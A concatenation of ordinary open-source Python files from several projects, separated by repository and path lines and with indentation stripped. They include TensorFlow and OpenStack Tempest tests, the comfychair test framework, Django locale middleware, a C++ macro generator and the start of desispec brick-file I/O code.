block_size = 3
with self.assertRaises(ValueError):
_ = array_ops.space_to_depth(x_np, block_size)
def testBlockSizeNotDivisibleHeight(self):
# The block size divides height but not width.
x_np = [[[[1], [2]], [[3], [4]], [[5], [6]]]]
block_size = 3
with self.assertRaises(ValueError):
_ = array_ops.space_to_depth(x_np, block_size)
def testBlockSizeNotDivisibleBoth(self):
# The block size divides neither width nor height.
x_np = [[[[1], [2]], [[3], [4]]]]
block_size = 3
with self.assertRaises(ValueError):
_ = array_ops.space_to_depth(x_np, block_size)
def testUnknownShape(self):
t = array_ops.space_to_depth(
array_ops.placeholder(dtypes.float32), block_size=4)
self.assertEqual(4, t.get_shape().ndims)
class SpaceToDepthGradientTest(test.TestCase):
# Check the gradients.
def _checkGrad(self, x, block_size):
assert 4 == x.ndim
with self.test_session(use_gpu=True):
tf_x = ops.convert_to_tensor(x)
tf_y = array_ops.space_to_depth(tf_x, block_size)
epsilon = 1e-2
((x_jacob_t, x_jacob_n)) = gradient_checker.compute_gradient(
tf_x,
x.shape,
tf_y,
tf_y.get_shape().as_list(),
x_init_value=x,
delta=epsilon)
self.assertAllClose(x_jacob_t, x_jacob_n, rtol=1e-2, atol=epsilon)
# Tests a gradient for space_to_depth of x which is a four dimensional
# tensor of shape [b, h * block_size, w * block_size, d].
def _compare(self, b, h, w, d, block_size):
block_size_sq = block_size * block_size
x = np.random.normal(0, 1, b * h * w * d *
block_size_sq).astype(np.float32).reshape(
[b, h * block_size, w * block_size, d])
self._checkGrad(x, block_size)
# Don't use very large numbers as dimensions here, as the result is a tensor
# with the cartesian product of the dimensions.
def testSmall(self):
block_size = 2
self._compare(1, 2, 3, 5, block_size)
def testSmall2(self):
block_size = 2
self._compare(2, 4, 3, 2, block_size)
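# Reference sketch (illustrative addition, NumPy only): space_to_depth moves each
# block_size x block_size spatial patch into the depth dimension, row-major within
# the patch, which is the ordering the expectations above encode. For example,
# _space_to_depth_reference(np.array([[[[1], [2]], [[3], [4]]]]), 2) returns
# [[[[1, 2, 3, 4]]]], matching testBasic.
def _space_to_depth_reference(x, block_size):
    b, h, w, d = x.shape
    x = x.reshape(b, h // block_size, block_size, w // block_size, block_size, d)
    x = x.transpose(0, 1, 3, 2, 4, 5)
    return x.reshape(b, h // block_size, w // block_size, block_size * block_size * d)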
if __name__ == "__main__":
test.main()
|
AsimmHirani/ISpyPi
|
refs/heads/master
|
tensorflow/contrib/tensorflow-master/tensorflow/python/util/future_api_test.py
|
173
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for future_api."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
# pylint: disable=unused-import
from tensorflow.python.util import future_api
# pylint: enable=unused-import
class ExampleParserConfigurationTest(tf.test.TestCase):
def testBasic(self):
self.assertFalse(hasattr(tf, 'arg_max'))
self.assertTrue(hasattr(tf, 'argmax'))
if __name__ == '__main__':
tf.test.main()
|
masayukig/tempest
|
refs/heads/master
|
tempest/api/compute/images/test_list_image_filters.py
|
2
|
# Copyright 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import time
import six
import testtools
from tempest.api.compute import base
from tempest.common import image as common_image
from tempest.common import waiters
from tempest import config
from tempest.lib.common.utils import data_utils
from tempest.lib.common.utils import test_utils
from tempest.lib import decorators
from tempest.lib import exceptions
CONF = config.CONF
class ListImageFiltersTestJSON(base.BaseV2ComputeTest):
max_microversion = '2.35'
@classmethod
def skip_checks(cls):
super(ListImageFiltersTestJSON, cls).skip_checks()
if not CONF.service_available.glance:
skip_msg = ("%s skipped as glance is not available" % cls.__name__)
raise cls.skipException(skip_msg)
@classmethod
def setup_clients(cls):
super(ListImageFiltersTestJSON, cls).setup_clients()
cls.client = cls.compute_images_client
# Check if glance v1 is available to determine which client to use. We
# prefer glance v1 for the compute API tests since the compute image
# API proxy was written for glance v1.
if CONF.image_feature_enabled.api_v1:
cls.glance_client = cls.os_primary.image_client
elif CONF.image_feature_enabled.api_v2:
cls.glance_client = cls.os_primary.image_client_v2
else:
raise exceptions.InvalidConfiguration(
'Either api_v1 or api_v2 must be True in '
'[image-feature-enabled].')
@classmethod
def resource_setup(cls):
super(ListImageFiltersTestJSON, cls).resource_setup()
def _create_image():
params = {
'name': data_utils.rand_name(cls.__name__ + '-image'),
'container_format': 'bare',
'disk_format': 'raw'
}
if CONF.image_feature_enabled.api_v1:
params.update({'is_public': False})
params = {'headers':
common_image.image_meta_to_headers(**params)}
else:
params.update({'visibility': 'private'})
body = cls.glance_client.create_image(**params)
body = body['image'] if 'image' in body else body
image_id = body['id']
cls.addClassResourceCleanup(
test_utils.call_and_ignore_notfound_exc,
cls.compute_images_client.delete_image,
image_id)
# Wait 1 second between creation and upload to ensure a delta
# between created_at and updated_at.
time.sleep(1)
image_file = six.BytesIO((b'*' * 1024))
if CONF.image_feature_enabled.api_v1:
cls.glance_client.update_image(image_id, data=image_file)
else:
cls.glance_client.store_image_file(image_id, data=image_file)
waiters.wait_for_image_status(cls.client, image_id, 'ACTIVE')
body = cls.client.show_image(image_id)['image']
return body
# Create non-snapshot images via glance
cls.image1 = _create_image()
cls.image1_id = cls.image1['id']
cls.image2 = _create_image()
cls.image2_id = cls.image2['id']
cls.image3 = _create_image()
cls.image3_id = cls.image3['id']
if not CONF.compute_feature_enabled.snapshot:
return
# Create instances and snapshots via nova
cls.server1 = cls.create_test_server()
cls.server2 = cls.create_test_server(wait_until='ACTIVE')
# NOTE(sdague) this is faster than doing the sync wait_until on both
waiters.wait_for_server_status(cls.servers_client,
cls.server1['id'], 'ACTIVE')
# Create images to be used in the filter tests
cls.snapshot1 = cls.create_image_from_server(
cls.server1['id'], wait_until='ACTIVE')
cls.snapshot1_id = cls.snapshot1['id']
# Servers have a hidden property for when they are being imaged
# Performing back-to-back create image calls on a single
# server will sometimes cause failures
cls.snapshot3 = cls.create_image_from_server(
cls.server2['id'], wait_until='ACTIVE')
cls.snapshot3_id = cls.snapshot3['id']
# Wait for the server to be active after the image upload
cls.snapshot2 = cls.create_image_from_server(
cls.server1['id'], wait_until='ACTIVE')
cls.snapshot2_id = cls.snapshot2['id']
@decorators.idempotent_id('a3f5b513-aeb3-42a9-b18e-f091ef73254d')
def test_list_images_filter_by_status(self):
# The list of images should contain only images with the
# provided status
params = {'status': 'ACTIVE'}
images = self.client.list_images(**params)['images']
self.assertNotEmpty([i for i in images if i['id'] == self.image1_id])
self.assertNotEmpty([i for i in images if i['id'] == self.image2_id])
self.assertNotEmpty([i for i in images if i['id'] == self.image3_id])
@decorators.idempotent_id('33163b73-79f5-4d07-a7ea-9213bcc468ff')
def test_list_images_filter_by_name(self):
# List of all images should contain the expected images filtered
# by name
params = {'name': self.image1['name']}
images = self.client.list_images(**params)['images']
self.assertNotEmpty([i for i in images if i['id'] == self.image1_id])
self.assertEmpty([i for i in images if i['id'] == self.image2_id])
self.assertEmpty([i for i in images if i['id'] == self.image3_id])
@decorators.idempotent_id('9f238683-c763-45aa-b848-232ec3ce3105')
@testtools.skipUnless(CONF.compute_feature_enabled.snapshot,
'Snapshotting is not available.')
def test_list_images_filter_by_server_id(self):
# The images should contain images filtered by server id
params = {'server': self.server1['id']}
images = self.client.list_images(**params)['images']
self.assertNotEmpty([i for i in images
if i['id'] == self.snapshot1_id],
"Failed to find image %s in images. "
"Got images %s" % (self.image1_id, images))
self.assertNotEmpty([i for i in images
if i['id'] == self.snapshot2_id])
self.assertEmpty([i for i in images if i['id'] == self.snapshot3_id])
@decorators.idempotent_id('05a377b8-28cf-4734-a1e6-2ab5c38bf606')
@testtools.skipUnless(CONF.compute_feature_enabled.snapshot,
'Snapshotting is not available.')
def test_list_images_filter_by_server_ref(self):
# The list of images should be filtered by server ref
server_links = self.server2['links']
# Try all server link types
for link in server_links:
params = {'server': link['href']}
images = self.client.list_images(**params)['images']
self.assertEmpty([i for i in images
if i['id'] == self.snapshot1_id])
self.assertEmpty([i for i in images
if i['id'] == self.snapshot2_id])
self.assertNotEmpty([i for i in images
if i['id'] == self.snapshot3_id])
@decorators.idempotent_id('e3356918-4d3e-4756-81d5-abc4524ba29f')
@testtools.skipUnless(CONF.compute_feature_enabled.snapshot,
'Snapshotting is not available.')
def test_list_images_filter_by_type(self):
# The list of images should be filtered by image type
params = {'type': 'snapshot'}
images = self.client.list_images(**params)['images']
self.assertNotEmpty([i for i in images
if i['id'] == self.snapshot1_id])
self.assertNotEmpty([i for i in images
if i['id'] == self.snapshot2_id])
self.assertNotEmpty([i for i in images
if i['id'] == self.snapshot3_id])
self.assertEmpty([i for i in images if i['id'] == self.image_ref])
@decorators.idempotent_id('3a484ca9-67ba-451e-b494-7fcf28d32d62')
def test_list_images_limit_results(self):
# Verify only the expected number of results are returned
params = {'limit': '1'}
images = self.client.list_images(**params)['images']
self.assertEqual(1, len([x for x in images if 'id' in x]))
@decorators.idempotent_id('18bac3ae-da27-436c-92a9-b22474d13aab')
def test_list_images_filter_by_changes_since(self):
# Verify only updated images are returned in the list
# Becoming ACTIVE will modify the updated time
# Filter by the image's created time
params = {'changes-since': self.image3['created']}
images = self.client.list_images(**params)['images']
found = [i for i in images if i['id'] == self.image3_id]
self.assertNotEmpty(found)
@decorators.idempotent_id('9b0ea018-6185-4f71-948a-a123a107988e')
def test_list_images_with_detail_filter_by_status(self):
# Detailed list of all images should only contain images
# with the provided status
params = {'status': 'ACTIVE'}
images = self.client.list_images(detail=True, **params)['images']
self.assertNotEmpty([i for i in images if i['id'] == self.image1_id])
self.assertNotEmpty([i for i in images if i['id'] == self.image2_id])
self.assertNotEmpty([i for i in images if i['id'] == self.image3_id])
@decorators.idempotent_id('644ea267-9bd9-4f3b-af9f-dffa02396a17')
def test_list_images_with_detail_filter_by_name(self):
# Detailed list of all images should contain the expected
# images filtered by name
params = {'name': self.image1['name']}
images = self.client.list_images(detail=True, **params)['images']
self.assertNotEmpty([i for i in images if i['id'] == self.image1_id])
self.assertEmpty([i for i in images if i['id'] == self.image2_id])
self.assertEmpty([i for i in images if i['id'] == self.image3_id])
@decorators.idempotent_id('ba2fa9a9-b672-47cc-b354-3b4c0600e2cb')
def test_list_images_with_detail_limit_results(self):
# Verify only the expected number of results (with full details)
# are returned
params = {'limit': '1'}
images = self.client.list_images(detail=True, **params)['images']
self.assertEqual(1, len(images))
@decorators.idempotent_id('8c78f822-203b-4bf6-8bba-56ebd551cf84')
@testtools.skipUnless(CONF.compute_feature_enabled.snapshot,
'Snapshotting is not available.')
def test_list_images_with_detail_filter_by_server_ref(self):
# Detailed list of images should be filtered by server ref
server_links = self.server2['links']
# Try all server link types
for link in server_links:
params = {'server': link['href']}
images = self.client.list_images(detail=True, **params)['images']
self.assertEmpty([i for i in images
if i['id'] == self.snapshot1_id])
self.assertEmpty([i for i in images
if i['id'] == self.snapshot2_id])
self.assertNotEmpty([i for i in images
if i['id'] == self.snapshot3_id])
@decorators.idempotent_id('888c0cc0-7223-43c5-9db0-b125fd0a393b')
@testtools.skipUnless(CONF.compute_feature_enabled.snapshot,
'Snapshotting is not available.')
def test_list_images_with_detail_filter_by_type(self):
# The detailed list of images should be filtered by image type
params = {'type': 'snapshot'}
images = self.client.list_images(detail=True, **params)['images']
self.client.show_image(self.image_ref)
self.assertNotEmpty([i for i in images
if i['id'] == self.snapshot1_id])
self.assertNotEmpty([i for i in images
if i['id'] == self.snapshot2_id])
self.assertNotEmpty([i for i in images
if i['id'] == self.snapshot3_id])
self.assertEmpty([i for i in images if i['id'] == self.image_ref])
@decorators.idempotent_id('7d439e18-ac2e-4827-b049-7e18004712c4')
def test_list_images_with_detail_filter_by_changes_since(self):
# Verify an updated image is returned
# Becoming ACTIVE will modify the updated time
# Filter by the image's created time
params = {'changes-since': self.image1['created']}
images = self.client.list_images(detail=True, **params)['images']
self.assertNotEmpty([i for i in images if i['id'] == self.image1_id])
|
GarethNelson/distcc
|
refs/heads/master
|
test/comfychair.py
|
24
|
#! /usr/bin/env python
# Copyright (C) 2002, 2003 by Martin Pool <mbp@samba.org>
# Copyright (C) 2003 by Tim Potter <tpot@samba.org>
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301,
# USA.
"""comfychair: a Python-based instrument of software torture.
Copyright (C) 2002, 2003 by Martin Pool <mbp@samba.org>
Copyright (C) 2003 by Tim Potter <tpot@samba.org>
This is a test framework designed for testing programs written in
Python, or (through a fork/exec interface) any other language.
For more information, see the file README.comfychair.
To run a test suite based on ComfyChair, just run it as a program.
"""
import sys, os, re, shutil
class TestCase:
"""A base class for tests. This class defines required functions which
can optionally be overridden by subclasses. It also provides some
utility functions for writing tests."""
def __init__(self):
self.test_log = ""
self.background_pids = []
self._cleanups = []
self._enter_rundir()
self._save_environment()
self.add_cleanup(self.teardown)
# Prevent localizations interfering with attempts to parse
# program output and error messages. LC_ALL has higher
# priority (see locale(7)), but set both just in case.
os.environ['LANG'] = 'C'
os.environ['LC_ALL'] = 'C'
# --------------------------------------------------
# Save and restore directory
def _enter_rundir(self):
self.basedir = os.getcwd()
self.add_cleanup(self._restore_directory)
self.rundir = os.path.join(self.basedir,
'_testtmp',
self.__class__.__name__)
self.tmpdir = os.path.join(self.rundir, 'tmp')
shutil.rmtree(self.rundir, ignore_errors=1)
os.makedirs(self.tmpdir)
os.chdir(self.rundir)
def _restore_directory(self):
os.chdir(self.basedir)
# --------------------------------------------------
# Save and restore environment
def _save_environment(self):
self._saved_environ = os.environ.copy()
self.add_cleanup(self._restore_environment)
def _restore_environment(self):
os.environ.clear()
os.environ.update(self._saved_environ)
def setup(self):
"""Set up test fixture."""
pass
def teardown(self):
"""Tear down test fixture."""
pass
def runtest(self):
"""Run the test."""
pass
def add_cleanup(self, c):
"""Queue a cleanup to be run when the test is complete."""
self._cleanups.append(c)
def apply_cleanups(self, debugger):
"""Apply cleanup functions and return error code.
Returns:
0 on success; 2 if a KeyboardInterrupt occurs; 1 if any other exception
occurs.
"""
while self._cleanups:
try:
apply(self._cleanups.pop())
except KeyboardInterrupt:
print "interrupted during cleanups"
_report_error(self, debugger)
return 2
except:
print "error during cleanups"
_report_error(self, debugger)
return 1
return 0
def fail(self, reason = ""):
"""Say the test failed."""
raise AssertionError(reason)
#############################################################
# Requisition methods
def require(self, predicate, message):
"""Check a predicate for running this test.
If the predicate value is not true, the test is skipped with a message explaining
why."""
if not predicate:
raise NotRunError, message
def require_root(self):
"""Skip this test unless run by root."""
self.require(os.getuid() == 0,
"must be root to run this test")
#############################################################
# Assertion methods
def assert_(self, expr, reason = ""):
if not expr:
raise AssertionError(reason)
def assert_equal(self, a, b):
if not a == b:
raise AssertionError("assertEquals failed: %s" % `(a, b)`)
def assert_notequal(self, a, b):
if a == b:
raise AssertionError("assertNotEqual failed: %s" % `(a, b)`)
def assert_re_match(self, pattern, s):
"""Assert that a string matches a particular pattern
Inputs:
pattern string: regular expression
s string: to be matched
Raises:
AssertionError if not matched
"""
if not re.match(pattern, s):
raise AssertionError("string does not match regexp\n"
" string: %s\n"
" re: %s" % (`s`, `pattern`))
def assert_re_search(self, pattern, s):
"""Assert that a string *contains* a particular pattern
Inputs:
pattern string: regular expression
s string: to be searched
Raises:
AssertionError if not matched
"""
if not re.search(pattern, s):
raise AssertionError("string does not contain regexp\n"
" string: %s\n"
" re: %s" % (`s`, `pattern`))
def assert_no_file(self, filename):
assert not os.path.exists(filename), ("file exists but should not: %s" % filename)
#############################################################
# Methods for running programs
def runcmd_background(self, cmd):
self.test_log = self.test_log + "Run in background:\n" + `cmd` + "\n"
pid = os.fork()
if pid == 0:
# child
try:
os.execvp("/bin/sh", ["/bin/sh", "-c", cmd])
finally:
os._exit(127)
self.test_log = self.test_log + "pid: %d\n" % pid
return pid
def runcmd(self, cmd, expectedResult = 0):
"""Run a command, fail if the command returns an unexpected exit
code. Return the output produced."""
rc, output, stderr = self.runcmd_unchecked(cmd)
if rc != expectedResult:
raise AssertionError("""command returned %d; expected %s: \"%s\"
stdout:
%s
stderr:
%s""" % (rc, expectedResult, cmd, output, stderr))
return output, stderr
def run_captured(self, cmd):
"""Run a command, capturing stdout and stderr.
Based in part on popen2.py
Returns (waitstatus, stdout, stderr)."""
import types
pid = os.fork()
if pid == 0:
# child
try:
pid = os.getpid()
openmode = os.O_WRONLY|os.O_CREAT|os.O_TRUNC
outfd = os.open('%d.out' % pid, openmode, 0666)
os.dup2(outfd, 1)
os.close(outfd)
errfd = os.open('%d.err' % pid, openmode, 0666)
os.dup2(errfd, 2)
os.close(errfd)
if isinstance(cmd, types.StringType):
cmd = ['/bin/sh', '-c', cmd]
os.execvp(cmd[0], cmd)
finally:
os._exit(127)
else:
# parent
exited_pid, waitstatus = os.waitpid(pid, 0)
stdout = open('%d.out' % pid).read()
stderr = open('%d.err' % pid).read()
return waitstatus, stdout, stderr
def runcmd_unchecked(self, cmd, skip_on_noexec = 0):
"""Invoke a command; return (exitcode, stdout, stderr)"""
waitstatus, stdout, stderr = self.run_captured(cmd)
assert not os.WIFSIGNALED(waitstatus), \
("%s terminated with signal %d" % (`cmd`, os.WTERMSIG(waitstatus)))
rc = os.WEXITSTATUS(waitstatus)
self.test_log = self.test_log + ("""Run command: %s
Wait status: %#x (exit code %d, signal %d)
stdout:
%s
stderr:
%s""" % (cmd, waitstatus, os.WEXITSTATUS(waitstatus), os.WTERMSIG(waitstatus),
stdout, stderr))
if skip_on_noexec and rc == 127:
# Either we could not execute the command or the command
# returned exit code 127. According to system(3) we can't
# tell the difference.
raise NotRunError, "could not execute %s" % `cmd`
return rc, stdout, stderr
def explain_failure(self, exc_info = None):
print "test_log:"
print self.test_log
def log(self, msg):
"""Log a message to the test log. This message is displayed if
the test fails, or when the runtests function is invoked with
the verbose option."""
self.test_log = self.test_log + msg + "\n"
class NotRunError(Exception):
"""Raised if a test must be skipped because of missing resources"""
def __init__(self, value = None):
self.value = value
def _report_error(case, debugger):
"""Ask the test case to explain failure, and optionally run a debugger
Input:
case TestCase instance
debugger if true, a debugger function to be applied to the traceback
"""
ex = sys.exc_info()
print "-----------------------------------------------------------------"
if ex:
import traceback
traceback.print_exc(file=sys.stdout)
case.explain_failure()
print "-----------------------------------------------------------------"
if debugger:
tb = ex[2]
debugger(tb)
def runtest(testcase_class, ret, verbose=0, debugger=None, subtest=0):
"""Instantiate test class, run it, and catch and report exceptions.
Inputs:
testcase_class a class derived from TestCase
ret return status, an integer
verbose an integer (used as boolean)
debugger debugger object to be applied to errors
subtest an integer (used as boolean)
Returns:
a new return status
Raises:
KeyboardInterrupt
If subtest is true, then the ordinary information about the
test progress is not printed.
"""
if not subtest:
print "%-30s" % _test_name(testcase_class),
def failure_print(message):
print message
else:
def failure_print(message):
print '[%s %s]' % (_test_name(testcase_class), message)
# flush now so that long running tests are easier to follow
sys.stdout.flush()
obj = None
try:
try:
# run test and sometimes show result
obj = testcase_class()
obj.setup()
obj.runtest()
if not subtest:
print "OK"
except KeyboardInterrupt:
failure_print("INTERRUPT")
if obj:
_report_error(obj, debugger)
raise
except NotRunError, msg:
failure_print("NOTRUN, %s" % msg.value)
except:
failure_print("FAIL")
if obj:
_report_error(obj, debugger)
return 1
finally:
if obj:
ret = obj.apply_cleanups(debugger) or ret
# Display log file if we're verbose
if ret == 0 and verbose:
obj.explain_failure()
return ret
def runtests(test_list, verbose = 0, debugger = None):
"""Run a series of tests.
Inputs:
test_list sequence of TestCase classes
verbose print more information as testing proceeds
debugger debugger object to be applied to errors
Returns:
unix return code: 0 for success, 1 for test failures, 2 for interruption
"""
import traceback
ret = 0
for testcase_class in test_list:
try:
ret = runtest(testcase_class, ret, verbose=verbose,
debugger=debugger)
except KeyboardInterrupt:
ret = 2
break
return ret
def _test_name(test_class):
"""Return a human-readable name for a test class.
"""
try:
return test_class.__name__
except:
return `test_class`
def print_help():
"""Help for people running tests"""
print """%s: software test suite based on ComfyChair
usage:
To run all tests, just run this program. To run particular tests,
list them on the command line.
options:
--help show usage message
--list list available tests
--verbose, -v show more information while running tests
--post-mortem, -p enter Python debugger on error
""" % sys.argv[0]
def print_list(test_list):
"""Show list of available tests"""
for test_class in test_list:
print " %s" % _test_name(test_class)
def main(tests, extra_tests=[]):
"""Main entry point for test suites based on ComfyChair.
inputs:
tests Sequence of TestCase subclasses to be run by default.
extra_tests Sequence of TestCase subclasses that are available but
not run by default.
Test suites should contain this boilerplate:
if __name__ == '__main__':
comfychair.main(tests)
This function handles standard options such as --help and --list, and
by default runs all tests in the suggested order.
Calls sys.exit() on completion.
"""
import getopt, sys
opt_verbose = 0
debugger = None
opts, args = getopt.getopt(sys.argv[1:], 'pv',
['help', 'list', 'verbose', 'post-mortem'])
for opt, opt_arg in opts:
if opt == '--help':
print_help()
return
elif opt == '--list':
print_list(tests + extra_tests)
return
elif opt == '--verbose' or opt == '-v':
opt_verbose = 1
elif opt == '--post-mortem' or opt == '-p':
import pdb
debugger = pdb.post_mortem
if args:
all_tests = tests + extra_tests
by_name = {}
for t in all_tests:
by_name[_test_name(t)] = t
which_tests = []
for name in args:
which_tests.append(by_name[name])
else:
which_tests = tests
sys.exit(runtests(which_tests, verbose=opt_verbose,
debugger=debugger))
if __name__ == '__main__':
print __doc__
|
noamelf/Open-Knesset
|
refs/heads/master
|
hashnav/__init__.py
|
14
|
from functools import wraps, update_wrapper
from base import View
from list import ListView
from detail import DetailView
def method_decorator(decorator):
"""
Converts a view function decorator into a method decorator.
the special thing about view decorators is that they expect
'request' to be their first argument.
Example:
class MyView(View):
allowed_methods = ['GET', 'POST']
@method_decorator(login_required)
def POST(*arg, **kwargs):
...
"""
def _dec(func):
def _wrapper(self, *args, **kwargs):
def bound_func(request, *args2, **kwargs2):
return func(self, *args2, **kwargs2)
# bound_func has the signature that 'decorator' expects i.e. no
# 'self' argument, but it is a closure over self so it can call
# 'func' correctly.
return decorator(bound_func)(self.request, *args, **kwargs)
return wraps(func)(_wrapper)
update_wrapper(_dec, decorator)
# Change the name to aid debugging.
_dec.__name__ = 'method_dec(%s)' % decorator.__name__
return _dec
|
Mozta/pagina-diagnostijuego
|
refs/heads/master
|
venv/lib/python2.7/site-packages/django/middleware/locale.py
|
32
|
"This is the locale selecting middleware that will look at accept headers"
from django.conf import settings
from django.conf.urls.i18n import is_language_prefix_patterns_used
from django.http import HttpResponseRedirect
from django.urls import get_script_prefix, is_valid_path
from django.utils import translation
from django.utils.cache import patch_vary_headers
from django.utils.deprecation import MiddlewareMixin
class LocaleMiddleware(MiddlewareMixin):
"""
This is a very simple middleware that parses a request
and decides what translation object to install in the current
thread context. This allows pages to be dynamically
translated to the language the user desires (if the language
is available, of course).
"""
response_redirect_class = HttpResponseRedirect
def process_request(self, request):
urlconf = getattr(request, 'urlconf', settings.ROOT_URLCONF)
i18n_patterns_used, prefixed_default_language = is_language_prefix_patterns_used(urlconf)
language = translation.get_language_from_request(request, check_path=i18n_patterns_used)
language_from_path = translation.get_language_from_path(request.path_info)
if not language_from_path and i18n_patterns_used and not prefixed_default_language:
language = settings.LANGUAGE_CODE
translation.activate(language)
request.LANGUAGE_CODE = translation.get_language()
def process_response(self, request, response):
language = translation.get_language()
language_from_path = translation.get_language_from_path(request.path_info)
urlconf = getattr(request, 'urlconf', settings.ROOT_URLCONF)
i18n_patterns_used, prefixed_default_language = is_language_prefix_patterns_used(urlconf)
if response.status_code == 404 and not language_from_path and i18n_patterns_used:
language_path = '/%s%s' % (language, request.path_info)
path_valid = is_valid_path(language_path, urlconf)
path_needs_slash = (
not path_valid and (
settings.APPEND_SLASH and not language_path.endswith('/') and
is_valid_path('%s/' % language_path, urlconf)
)
)
if path_valid or path_needs_slash:
script_prefix = get_script_prefix()
# Insert language after the script prefix and before the
# rest of the URL
language_url = request.get_full_path(force_append_slash=path_needs_slash).replace(
script_prefix,
'%s%s/' % (script_prefix, language),
1
)
return self.response_redirect_class(language_url)
if not (i18n_patterns_used and language_from_path):
patch_vary_headers(response, ('Accept-Language',))
if 'Content-Language' not in response:
response['Content-Language'] = language
return response
|
hthompson6/contrail-controller
|
refs/heads/master
|
src/base/factory_macros.py
|
15
|
#!/usr/bin/python
#
# Copyright (c) 2013 Juniper Networks, Inc. All rights reserved.
#
def generate_header(file):
header = """//
// Generated by base/factory_macros.py
//
"""
file.write(header)
macro_tmpl = """#define FACTORY_TYPE_N%(cardinality)d(_Module, _T%(comma)s%(argument_types)s)
public:
template <class U>
static typename boost::enable_if<boost::is_same<U, _T>, void>::type
Register(boost::function<_T *(%(argument_types)s)> function) {
_Module *obj = GetInstance();
obj->make_ ## _T ## _ = function;
}
template <class U>
static typename boost::enable_if<boost::is_same<U, _T>, _T *>::type
Create(%(argument_decl)s) {
_Module *obj = GetInstance();
return obj->make_ ## _T ## _(%(call_arguments)s);
}
private:
boost::function<_T *(%(argument_types)s)> make_ ## _T ##_
"""
def generate_n(file, cardinality):
call_arguments = ''
decl = ''
types = ''
for n in range(cardinality):
if n:
call_arguments += ', '
decl += ', '
types += ', '
call_arguments += 'a%d' % n
decl += 'A%d a%d' % (n, n)
types += 'A%d' % n
if cardinality:
comma = ', '
else:
comma = ''
macro = macro_tmpl % {
'argument_decl': decl,
'argument_types': types,
'call_arguments': call_arguments,
'cardinality': cardinality,
'comma': comma,
}
file.write(macro.replace('\n', '\\\n'))
file.write('\n')
def generate(filename):
file = open(filename, 'w')
generate_header(file)
for n in range(8):
generate_n(file, n)
file.close()
if __name__ == '__main__':
generate("src/base/factory_macros.h")
|
samuelshaner/openmc
|
refs/heads/develop
|
tests/test_trigger_batch_interval/test_trigger_batch_interval.py
|
8
|
#!/usr/bin/env python
import os
import sys
sys.path.insert(0, os.pardir)
from testing_harness import TestHarness
if __name__ == '__main__':
harness = TestHarness('statepoint.15.*', True)
harness.main()
|
gdhungana/desispec
|
refs/heads/master
|
py/desispec/io/brick.py
|
2
|
"""
desispec.io.brick
=================
I/O routines for working with per-brick files.
See ``doc/DESI_SPECTRO_REDUX/SPECPROD/bricks/BRICKID/*-BRICKID.rst`` in desidatamodel
for a description of the relevant data models.
See :doc:`coadd` and `DESI-doc-1056 <https://desi.lbl.gov/DocDB/cgi-bin/private/ShowDocument?docid=1056>`_
for general information about the coaddition dataflow and algorithms.
"""
import os
import os.path
import re
import warnings
import numpy as np
import astropy.io.fits
from desiutil.depend import add_dependencies
import desispec.io.util
#- For backwards compatibility, derive brickname from filename
def _parse_brick_filename(filepath):
"""return (channel, brickname) from /path/to/brick-[brz]-{brickname}.fits
"""
filename = os.path.basename(filepath)
warnings.warn('Deriving channel and brickname from filename {} instead of contents'.format(filename))
m = re.match(r'brick-([brz])-(\w+)\.fits', filename)
if m is None:
raise ValueError('Unable to derive channel and brickname from '+filename)
else:
return m.groups() #- (channel, brickname)
class BrickBase(object):
"""Represents objects in a single brick and possibly also a single band b,r,z.
The constructor will open an existing file, or create a new file and its parent
directory if necessary. The :meth:`close` method must be called for any updates
or new data to be recorded. Successful completion of the constructor does not
guarantee that :meth:`close` will succeed.
Args:
path(str): Path to the brick file to open.
mode(str): File access mode to use. Should normally be 'readonly' or 'update'. Use 'update' to create a new file and its parent directory if necessary.
header: An optional header specification used to create a new file. See :func:`desispec.io.util.fitsheader` for details on allowed values.
Raises:
RuntimeError: Invalid mode requested.
IOError: Unable to open existing file in 'readonly' mode.
OSError: Unable to create a new parent directory in 'update' mode.
"""
def __init__(self,path,mode = 'readonly',header = None):
if mode not in ('readonly','update'):
raise RuntimeError('Invalid mode %r' % mode)
self.path = path
self.mode = mode
# Create a new file if necessary.
if self.mode == 'update' and not os.path.exists(self.path):
# BRICKNAM must be in header if creating the file for the first time
if header is None or 'BRICKNAM' not in header:
raise ValueError('header must have BRICKNAM when creating new brick file')
self.brickname = header['BRICKNAM']
if 'CHANNEL' in header:
self.channel = header['CHANNEL']
else:
self.channel = 'brz' #- could be any spectrograph channel
# Create the parent directory, if necessary.
head,tail = os.path.split(self.path)
if not os.path.exists(head):
os.makedirs(head)
# Create empty HDUs. It would be good to refactor io.frame to avoid any duplication here.
hdr = desispec.io.util.fitsheader(header)
add_dependencies(hdr)
hdr['EXTNAME'] = ('FLUX', 'no dimension')
hdu0 = astropy.io.fits.PrimaryHDU(header = hdr)
hdr['EXTNAME'] = ('IVAR', 'no dimension')
hdu1 = astropy.io.fits.ImageHDU(header = hdr)
hdr['EXTNAME'] = ('WAVELENGTH', '[Angstroms]')
hdu2 = astropy.io.fits.ImageHDU(header = hdr)
hdr['EXTNAME'] = ('RESOLUTION', 'no dimension')
hdu3 = astropy.io.fits.ImageHDU(header = hdr)
